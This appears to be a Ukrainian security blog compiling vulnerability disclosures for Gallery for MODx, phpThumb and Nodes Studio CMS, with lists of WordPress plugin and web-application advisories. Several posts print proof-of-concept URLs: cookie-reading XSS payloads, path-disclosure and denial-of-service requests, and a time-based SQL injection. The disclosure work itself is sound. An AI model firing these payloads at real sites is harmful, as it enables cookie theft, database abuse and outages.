Websecurity - Веб безпека

У липні, 31.07.2014, я виявив численні уразливості в Gallery для MODx. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

В компоненті Gallery для MODx використовуються phpThumb. Ця бібліотека має XSS, FPD, AoF і DoS в уразливості подібні до TimThumb, тому Gallery теж вразливий.

XSS (WASC-08):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/assets/components/gallery/connector.php?action=web/phpthumb
http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://

Abuse of Functionality (WASC-42):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/assets/components/gallery/connector.php?action=web/phpthumb&src=src=http://site/big_file&h=1&w=1

Уразливі всі версії компонента Gallery для MODx.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Disqus, All In One SEO Pack та ShortCode. Для котрих з’явилися експлоіти. Disqus - це плагін для написання коментарів, All In One SEO Pack - це плагін для пошукової оптимізації сайта, ShortCode - це мега пакет коротких кодів.

• Disqus 2.7.5 Cross Site Request Forgery / Cross Site Scripting (деталі)
• WordPress All In One SEO Pack 2.2.2 Cross Site Scripting (деталі)
• WordPress ShortCode 0.2.3 Local File Inclusion (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• RSA Security Analytics Multiple Vulnerabilities (деталі)
• TomatoCart v1.x (latest-stable) Multiple Vulnerabilities (деталі)
• Multiple Cross-Site Scripting vulnerabilities in OCS Inventory NG (деталі)
• Apache Cordova 3.5.1: CVE-2014-3502 update (деталі)
• EMC Replication Manager Unquoted File Path Enumeration Vulnerability (деталі)

У січні, 24.01.2015, я виявив Abuse of Functionality, Brute Force та Cross-Site Request Forgery уразливості в D-Link DCS-910 (веб камера).

Раніше я писав про уразливості в пристроях даної компанії, зокрема в D-Link DVG-5402SP та D-Link DCS-910.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам пристрою.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Disqus, Mobile Pack та KenBurner Slider. Для котрих з’явилися експлоіти. Disqus - це плагін для написання коментарів, Mobile Pack - це плагін для перетворення сайта у мобільний веб додаток, KenBurner Slider - це плагін для створення слайдеру.

• WordPress Disqus 2.7.5 CSRF / Cross Site Scripting (деталі)
• WordPress Mobile Pack 2.0.1 Information Disclosure (деталі)
• WordPress KenBurner Slider Arbitrary File Download (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Ще у березні, 05.03.2011, я виявив численні уразливості в phpThumb. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Цей веб додаток зроблений на основі TimThumb і має подібні XSS, FPD, AoF і DoS уразливості.

XSS (WASC-08):

http://site/phpThumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/phpThumb.php
http://site/phpThumb.php?src=http://

Abuse of Functionality (WASC-42):

http://site/phpThumb.php?src=http://site&h=1&w=1

Denial of Service (WASC-10):

http://site/phpThumb.php?src=src=http://site/big_file&h=1&w=1

Уразливі всі версії phpThumb та веб додатки, що його використовують.

В даній добірці уразливості в веб додатках:

• RSA Archer GRC Multiple Cross-Site Scripting Vulnerabilities (деталі)
• Multiple vulnerabilities in Readsoft Invoice Processing and Process Director (деталі)
• Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities (деталі)
• reportbug security update (деталі)
• Open-Xchange Security Advisory 2014-01-06 (деталі)

У серпні, 07.08.2014, я знайшов та SQL Injection, Cross-Site Scripting та Full Path Disclosure уразливості в Nodes Studio CMS.

Це російська комерційна CMS, що я виявив на одному сайті російських терористів і пропагандистів.

SQL Injection (WASC-19):

http://site/news/%22%20or%20benchmark(10000000,md5(now()))%3E0%23

В системі наявна фільтрація ключових слів (таких як from) для протидії SQLi атакам. Але це можна обійти за допомогою спеціальної техніки, або можна провести DoS атаку через SQLi.

Cross-Site Scripting (WASC-08):

http://site/news/%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Full Path Disclosure (WASC-13):

http://site/news/%22%201

Уразливі всі версії системи.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WPSS, GB Gallery Slideshow та CK-And-SyntaxHighLighter. Для котрих з’явилися експлоіти. WordPress Spreadsheet (WPSS) - це плагін для розміщення таблиць, GB Gallery Slideshow - це плагін для створення галереї та слайдшоу, CK-And-SyntaxHighLighter - це плагін для підсвітки синтаксису.

• WordPress WPSS 0.62 Cross Site Scripting (деталі)
• WordPress GB Gallery Slideshow 1.5 SQL Injection (деталі)
• WordPress CK-And-SyntaxHighLighter Arbitrary File Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Operations Orchestration, Unauthorized Access to Information (деталі)
• mediawiki security update (деталі)
• Apache Hive Authorization vulnerability (деталі)
• Apache Continuum affected by Remote Command Execution (деталі)
• HP Operations Orchestration, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) (деталі)